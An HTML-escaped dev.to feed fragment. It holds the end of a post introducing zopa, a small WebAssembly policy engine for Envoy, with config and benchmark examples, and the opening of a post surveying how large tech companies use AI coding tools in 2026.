&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;malloc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;free&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;evaluate&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;memory&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;instance&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;exports&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;enc&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nc"&gt;TextEncoder&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;obj&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;bytes&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;enc&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;encode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;JSON&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;stringify&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;obj&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;ptr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;malloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;bytes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;length&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nc"&gt;Uint8Array&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;memory&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;buffer&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;ptr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;bytes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;length&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nf"&gt;set&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;bytes&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;ptr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;bytes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;length&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;ip&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;il&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;write&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt; &lt;span class="na"&gt;user&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="na"&gt;role&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;admin&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="p"&gt;});&lt;/span&gt;
&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;ap&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;al&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;write&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
  &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;compare&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="na"&gt;op&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;eq&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="na"&gt;left&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;  &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;ref&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;   &lt;span class="na"&gt;path&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;input&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;user&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;role&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
  &lt;span class="na"&gt;right&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;value&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;admin&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
&lt;span class="p"&gt;});&lt;/span&gt;

&lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;evaluate&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;ip&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;il&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;ap&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;al&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt; &lt;span class="c1"&gt;// 1 (allow)&lt;/span&gt;
&lt;span class="nf"&gt;free&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;ip&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="nf"&gt;free&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;ap&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;proxy_*&lt;/code&gt; stubs in &lt;code&gt;env&lt;/code&gt; are there because proxy-wasm imports must resolve before the wasm module instantiates. &lt;code&gt;evaluate&lt;/code&gt; itself doesn't call into them, so dummies are fine.&lt;/p&gt;

&lt;h3&gt;
  
  
  As an Envoy proxy-wasm filter
&lt;/h3&gt;

&lt;p&gt;Drop the wasm into &lt;code&gt;http_filters&lt;/code&gt;. Two important fields: &lt;code&gt;vm_config&lt;/code&gt; and &lt;code&gt;configuration&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;http_filters&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;envoy.filters.http.wasm&lt;/span&gt;
    &lt;span class="na"&gt;typed_config&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;@type"&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s"&gt;type.googleapis.com/envoy.extensions.filters.http.wasm.v3.Wasm&lt;/span&gt;
      &lt;span class="s"&gt;config&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;configuration&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;@type"&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s"&gt;type.googleapis.com/google.protobuf.StringValue&lt;/span&gt;
          &lt;span class="s"&gt;value&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
            &lt;span class="s"&gt;{"type":"module","rules":[&lt;/span&gt;
              &lt;span class="s"&gt;{"type":"rule","name":"allow","default":true,&lt;/span&gt;
               &lt;span class="s"&gt;"value":{"type":"value","value":false}},&lt;/span&gt;
              &lt;span class="s"&gt;{"type":"rule","name":"allow","body":[&lt;/span&gt;
                &lt;span class="s"&gt;{"type":"eq",&lt;/span&gt;
                 &lt;span class="s"&gt;"left":{"type":"ref","path":["input","method"]},&lt;/span&gt;
                 &lt;span class="s"&gt;"right":{"type":"value","value":"GET"}}]}&lt;/span&gt;
            &lt;span class="s"&gt;]}&lt;/span&gt;
        &lt;span class="na"&gt;vm_config&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;runtime&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;envoy.wasm.runtime.v8&lt;/span&gt;
          &lt;span class="na"&gt;code&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
            &lt;span class="na"&gt;local&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
              &lt;span class="na"&gt;filename&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/etc/zopa/zopa.wasm&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;configuration.value&lt;/code&gt; is the policy AST as JSON. The example reads "GET passes; everything else denies".&lt;/p&gt;

&lt;p&gt;A complete end-to-end sample lives in &lt;a href="https://github.com/0-draft/zopa/tree/main/examples/envoy" rel="noopener noreferrer"&gt;&lt;code&gt;examples/envoy/&lt;/code&gt;&lt;/a&gt;; &lt;code&gt;zig build test-envoy&lt;/code&gt; runs curl assertions against a real Envoy. CI exercises Node, wasmtime, and a real Envoy on every commit.&lt;/p&gt;

&lt;h3&gt;
  
  
  Container image
&lt;/h3&gt;

&lt;p&gt;There's also a distroless OCI image. Multi-arch (amd64 / arm64) and cosign keyless-signed.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker pull ghcr.io/0-draft/zopa:v0.2.0
docker run &lt;span class="nt"&gt;--rm&lt;/span&gt; &lt;span class="nt"&gt;--entrypoint&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;ls &lt;/span&gt;ghcr.io/0-draft/zopa:v0.2.0 &lt;span class="nt"&gt;-lh&lt;/span&gt; /zopa.wasm
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The intended use is staging &lt;code&gt;/zopa.wasm&lt;/code&gt; from an initContainer into the Envoy sidecar pod.&lt;/p&gt;

&lt;h3&gt;
  
  
  Latency
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;zig build bench&lt;/code&gt; runs a zopa-only latency benchmark. On a local M-series Mac with &lt;code&gt;--release=small&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;fixture                 |    p50 |    p95 |    p99 |   mean
------------------------+--------+--------+--------+-------
01_static               |  1.79  |  2.96  |  3.46  |  1.73  (μs)
02_header_eq            |  4.42  |  4.96  |  5.17  |  4.48  (μs)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Literal &lt;code&gt;true&lt;/code&gt; policy: 1.79 μs at p50. A simple &lt;code&gt;input.method == "GET"&lt;/code&gt; style compare: 4.42 μs at p50. Wall-clock direct measurement, 10 000 iterations after 1 000 warmup. No head-to-head against OPA / Cedar yet; cross-engine numbers wait until the conformance corpus is wide enough to honestly assert "same answer".&lt;/p&gt;

&lt;h2&gt;
  
  
  Where it sits relative to alternatives
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Item&lt;/th&gt;
&lt;th&gt;OPA&lt;/th&gt;
&lt;th&gt;Cedar&lt;/th&gt;
&lt;th&gt;Casbin&lt;/th&gt;
&lt;th&gt;zopa&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Language&lt;/td&gt;
&lt;td&gt;Go&lt;/td&gt;
&lt;td&gt;Rust&lt;/td&gt;
&lt;td&gt;Go (+ ports)&lt;/td&gt;
&lt;td&gt;Zig&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Wasm distribution&lt;/td&gt;
&lt;td&gt;Yes (heavy)&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes (~60KB)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Memory model&lt;/td&gt;
&lt;td&gt;GC&lt;/td&gt;
&lt;td&gt;RC + arenas&lt;/td&gt;
&lt;td&gt;GC&lt;/td&gt;
&lt;td&gt;per-request arena&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;proxy-wasm&lt;/td&gt;
&lt;td&gt;Side project&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;First-class&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Policy input&lt;/td&gt;
&lt;td&gt;Rego source&lt;/td&gt;
&lt;td&gt;Cedar source&lt;/td&gt;
&lt;td&gt;CSV / source&lt;/td&gt;
&lt;td&gt;Compiled AST&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Maturity&lt;/td&gt;
&lt;td&gt;CNCF Graduated&lt;/td&gt;
&lt;td&gt;Stable&lt;/td&gt;
&lt;td&gt;Mature&lt;/td&gt;
&lt;td&gt;Alpha&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Zopa isn't a replacement for OPA when you need full Rego, the management plane, bundle distribution, partial evaluation, or the state API. Use OPA for those. Zopa solves a narrow case: "I can compile the policy elsewhere and just want to evaluate at the edge". For that case, the wasm binary is two orders of magnitude smaller than OPA's.&lt;/p&gt;

&lt;p&gt;It fits when "Rego-ish syntax, but OPA is too heavy" and "Cedar / Casbin can't go to wasm" line up at the same time.&lt;/p&gt;

&lt;h2&gt;
  
  
  Try it and tell me
&lt;/h2&gt;

&lt;p&gt;Zopa's source is 8 files under &lt;code&gt;src/&lt;/code&gt;, no deps outside stdlib, readable top to bottom. Sized so that if you want to change something, you can fork and rewrite.&lt;/p&gt;

&lt;p&gt;Feedback I'd love:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;"&lt;code&gt;tools/rego2ast.py&lt;/code&gt; rejects my policy with Unsupported on this node, please add it"&lt;/li&gt;
&lt;li&gt;"proxy-wasm host X (Istio / Kong / APISIX) worked / didn't work like this"&lt;/li&gt;
&lt;li&gt;"Cases I'd add to the conformance corpus"&lt;/li&gt;
&lt;li&gt;"The &lt;code&gt;allow_body&lt;/code&gt; 64 KiB cap is too small / too large"&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Reference
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Repo: &lt;a href="https://github.com/0-draft/zopa" rel="noopener noreferrer"&gt;https://github.com/0-draft/zopa&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Issues: &lt;a href="https://github.com/0-draft/zopa/issues" rel="noopener noreferrer"&gt;https://github.com/0-draft/zopa/issues&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;v0.2.0 release: &lt;a href="https://github.com/0-draft/zopa/releases/tag/v0.2.0" rel="noopener noreferrer"&gt;https://github.com/0-draft/zopa/releases/tag/v0.2.0&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;OCI image: &lt;code&gt;ghcr.io/0-draft/zopa:v0.2.0&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;proxy-wasm spec: &lt;a href="https://github.com/proxy-wasm/spec" rel="noopener noreferrer"&gt;https://github.com/proxy-wasm/spec&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>webassembly</category>
      <category>authorization</category>
      <category>zig</category>
      <category>opensource</category>
    </item>
    <item>
      <title>What 11 big tech companies actually do with AI in 2026</title>
      <dc:creator>kt</dc:creator>
      <pubDate>Sat, 09 May 2026 12:40:10 +0000</pubDate>
      <link>https://dev.to/kanywst/what-11-big-tech-companies-actually-do-with-ai-in-2026-a-layered-numbers-first-breakdown-h58</link>
      <guid>https://dev.to/kanywst/what-11-big-tech-companies-actually-do-with-ai-in-2026-a-layered-numbers-first-breakdown-h58</guid>
      <description>&lt;h1&gt;
  
  
  Introduction
&lt;/h1&gt;

&lt;p&gt;I keep having this conversation lately, both inside and outside work.&lt;/p&gt;

&lt;p&gt;"How are you using AI?"&lt;br&gt;
"Mostly Claude Code and Cursor. Hooked our internal wiki up over MCP too."&lt;br&gt;
"Yeah, same here."&lt;/p&gt;

&lt;p&gt;That's where it stops. We can both say "the tools are installed" without flinching. But beyond that, the second you ask &lt;strong&gt;what actually changed, or how it shows up in any organizational number&lt;/strong&gt;, the answers thin out fast. Every engineer I know is using AI day to day, yet I rarely get the feeling that it's translated into anything visible at the team or company level.&lt;/p&gt;

&lt;p&gt;Meanwhile, when you read the news about companies that everyone agrees are good at this, the numbers are on a different scale. Google says &lt;strong&gt;75% of new code is AI-generated&lt;/strong&gt;. Stripe's internal coding agents merge &lt;strong&gt;1,300+ PRs a week&lt;/strong&gt;. Mercari reports &lt;strong&gt;95% of employees actively use AI tools&lt;/strong&gt; and that &lt;strong&gt;per-engineer output is up 64% year over year&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;What's behind that gap? What are these companies concretely doing, and what do they have that the rest of us don't? I went through the major IT companies (US and Japan) end to end and pulled this together as a single map.&lt;/p&gt;

&lt;p&gt;Everything below leans on first-party sources: official blogs, CEO statements, internal memos that went public, research workshop materials. Where I'm guessing, I say so. Where I don't know, I leave it out.&lt;/p&gt;

&lt;h3&gt;
  
  
  One thing to set up first: in 2026, Claude is the de facto standard for coding
&lt;/h3&gt;

&lt;p&gt;Before getting into individual companies, here's a piece of context worth front-loading. As of May 2026, &lt;strong&gt;Claude (Anthropic) dominates the coding-tool space by a wide margin&lt;/strong&gt;. The Pragmatic Engineer survey from February 2026 makes this concrete:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;Share naming it the "most loved coding tool"&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Claude Code&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;46%&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cursor&lt;/td&gt;
&lt;td&gt;19%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GitHub Copilot&lt;/td&gt;
&lt;td&gt;9%&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The latest SWE-bench Verified numbers tell the same story: Claude Sonnet 4.6 sits at &lt;strong&gt;82.1%&lt;/strong&gt;, while Gemini 3 is at 63.8%, an 18-point spread. Meta's DevMate (covered later) runs on Claude. Reporting suggests even some Google engineers reach for Claude Code internally.&lt;/p&gt;

&lt;p&gt;OpenAI's &lt;strong&gt;Codex&lt;/strong&gt; hit &lt;strong&gt;3 million weekly active users&lt;/strong&gt; by March 2026, so it has the biggest base by raw user count. But the same surveys put it below Claude Code, Cursor, and Copilot when you ask developers what they actually love using. &lt;strong&gt;Wide reach (Codex / ChatGPT)&lt;/strong&gt; and &lt;strong&gt;high agent-quality reputation (Claude Code)&lt;/strong&gt; are running on different metrics in 2026. ChatGPT and Gemini are roughly tied for general-purpose chat, but for coding agents specifically, Claude is clearly out in front.&lt;/p&gt;




&lt;h2&gt;
  
  
  0. Glossary: terms used throughout
&lt;/h2&gt;

&lt;p&gt;Skip this section if you already know all of these. I'm trying to avoid arguments downstream.&lt;/p&gt;

&lt;h3&gt;
  
  
  0.1 The four generations of coding AI
&lt;/h3&gt;

&lt;p&gt;The shape of coding AI has shifted a lot over the past few years. As of May 2026, we're at generation 4.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Generation&lt;/th&gt;
&lt;th&gt;Name&lt;/th&gt;
&lt;th&gt;What it does&lt;/th&gt;
&lt;th&gt;Representative tools&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Gen 1&lt;/td&gt;
&lt;td&gt;Code completion&lt;/td&gt;
&lt;td&gt;Suggest the next tokens, accept with Tab&lt;/td&gt;
&lt;td&gt;GitHub Copilot (2021)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Gen 2&lt;/td&gt;
&lt;td&gt;Chat / inline edits&lt;/td&gt;
&lt;td&gt;Edit multiple files via natural language&lt;/td&gt;
&lt;td&gt;Cursor / Copilot Chat / ChatGPT&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Gen 3&lt;/td&gt;
&lt;td&gt;Agent&lt;/td&gt;
&lt;td&gt;Take an Issue and produce a PR autonomously&lt;/td&gt;
&lt;td&gt;Claude Code / Codex (OpenAI) / Copilot Coding Agent / Devin&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Gen 4&lt;/td&gt;
&lt;td&gt;Multi-agent / autonomous execution&lt;/td&gt;
&lt;td&gt;Run agents in parallel, human approves at key points&lt;/td&gt;
&lt;td&gt;Claude Code Auto Mode / Codex Cloud / Copilot subagent / Minions&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Gen 3 means: hand the agent an Issue or ticket, and it plans, implements, runs tests, and opens a PR. It runs &lt;code&gt;npm install&lt;/code&gt; and &lt;code&gt;pytest&lt;/code&gt; itself. The "internal agents" you'll see throughout this article are mostly Gen 3.&lt;/p&gt;

&lt;p&gt;Gen 4 layers something on top: &lt;strong&gt;one engineer running multiple agents in parallel, only stepping in to approve key decisions&lt;/strong&gt;. That's how Anthropic itself works internally, and it's the direction every company in this article is pushing toward.&lt;/p&gt;

&lt;h3&gt;
  
  
  0.2 Tools by name
&lt;/h3&gt;

&lt;p&gt;Quick orientation on the tools that come up below.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;GitHub Copilot&lt;/strong&gt;: Microsoft / GitHub's AI coding assistant. Started as Gen 1 completion in 2021; in 2026 it has a Gen 3 "Coding Agent" too.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cursor&lt;/strong&gt;: AI-first editor forked from VS Code. The flagship of Gen 2 (chat-driven multi-file editing). Spread fast as the day-to-day editor at Stripe, Shopify, Salesforce, and others.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Claude Code&lt;/strong&gt;: Anthropic's CLI coding agent. The textbook Gen 3 tool: it edits files, runs commands, and runs tests from your terminal.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Codex (OpenAI)&lt;/strong&gt;: OpenAI's coding agent, relaunched in May 2025. Available across ChatGPT, a CLI, a desktop app, and IDE integrations. Runs on GPT-5.5-Codex. &lt;strong&gt;3 million weekly actives as of March 2026&lt;/strong&gt; make its base the largest, but it trails Claude Code in pure coding-quality reputation (more on this later).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Amazon Q Developer&lt;/strong&gt;: AWS's coding/operations AI. Strong at large migrations like Java 8 to Java 17.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;DevMate / Minions / Agentforce&lt;/strong&gt;: internal agents at Meta, Stripe, and Salesforce respectively. Detailed below.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  0.3 MCP (Model Context Protocol)
&lt;/h3&gt;

&lt;p&gt;A protocol Anthropic published at the end of 2024 for &lt;strong&gt;letting LLMs call external tools (your wiki, Slack, Jira, databases, the file system) in a standardized way&lt;/strong&gt;. Think of it as "tool use, open-standardized." Cursor, Claude Code, Copilot, and basically every major tool can read MCP servers now. As of May 2026, "expose our internal tools as MCP servers so the agents can hit them" is a normal weekly task. That's what the opening conversation in this article was referring to.&lt;/p&gt;

&lt;h3&gt;
  
  
  0.4 RAG (Retrieval-Augmented Generation)
&lt;/h3&gt;

&lt;p&gt;The technique for getting an LLM to answer using information it never saw during training (your internal docs, basically). When a question comes in, you retrieve relevant documents first, then pass them along to the LLM. Whenever I write "LLM-ifying internal search," that's what I mean.&lt;/p&gt;

&lt;h3&gt;
  
  
  0.5 Tier 1/2 support
&lt;/h3&gt;

&lt;p&gt;Customer-support shorthand. Tier 1 handles simple FAQ-level questions, Tier 2 needs subject-matter expertise, Tier 3 escalates to engineering. This comes up in the Salesforce section.&lt;/p&gt;




&lt;h2&gt;
  
  
  1. The four layers of "AI use"
&lt;/h2&gt;

&lt;p&gt;People say "AI use" like it's one thing. In practice, what companies are doing splits cleanly into four layers. If you have this map in mind, the rest of the article reads in a straight line.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fue8e09ieik4gtgqlvb8f.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fue8e09ieik4gtgqlvb8f.png" alt="ai-use" width="483" height="827"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Most companies are stuck at L1. &lt;strong&gt;Cursor and Claude Code are deployed company-wide, but no organizational number reflects it yet&lt;/strong&gt;, that situation. "People are using it daily" is true, but no bridge has been built into L2 (operations) or L3 (customer-facing product). The 11 companies below have all pushed into L2, L3, and even L4. That's the gap.&lt;/p&gt;

&lt;p&gt;From here I walk through each company in shallow-to-deep layer order (L1 first, then L1+L2, then L3, then L4). Every section says up front which layer that company is in.&lt;/p&gt;




&lt;h2&gt;
  
  
  2. Companies pushing hardest at L1
&lt;/h2&gt;

